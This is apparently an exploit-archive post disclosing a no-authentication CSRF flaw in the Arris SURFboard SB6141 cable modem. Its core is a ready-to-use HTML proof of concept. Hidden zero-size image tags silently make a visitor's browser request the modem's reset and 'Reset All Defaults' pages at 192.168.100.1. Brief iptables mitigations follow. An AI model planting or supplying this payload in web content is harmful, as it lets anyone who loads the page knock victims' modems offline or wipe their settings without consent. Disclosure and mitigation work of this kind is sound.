ARRIS (formerly Motorola) SURFboard modems are highly popular broadband cable modems with a reputation for reliability. The SB6141 model in particular can be found for around $70 US, is capable of supporting well over 150 megabit speeds, and works with all the major US Internet providers. According to ARRIS’ documentation, the SB6141 is the world’s most popular cable modem with over 135 million in production.
VENDOR : motorola
Website : http://www.surfboard.com/products/sb6141/
Affected firmware : SB_KOMODO-22.214.171.124-SCM01-NOSH
Here is the proof of concept code for remote modem reset and its super easy!
Arris SURFboard SB6141 NO AUTH and CSRF RESET EXPLOIT
[*] Vulnerability found by : David Longenecker
[*] Exploit by : M U Suraj($r00t)
<h1 style=”color:dodgerblue;font-family:consolas;”>Arris SURFboard SB6141 NO AUTH RESET CSRF EXPLOIT</h1>
<u style=”font-family:consolas;”>Created by Suraj($r00t)</u>
<img src=”http://192.168.100.1/reset.htm ” style=”width:0px;height:0px;”>
<img src=”http://192.168.100.1/cmConfigData.htm?BUTTON_INPUT1=Reset+All+Defaults ” style=”width:0px;height:0px;”>
- Adding rules to IP Tables to drop the packet on 192.168.100.1. (iptables -I FORWARD -d 192.168.100.1 -j DROP, iptables -I FORWARD -s x.x.x.x -d 192.168.100.1 -j ACCEPT)
- Wait for the security update, expectations maybe UI Authentication and CSRF protection.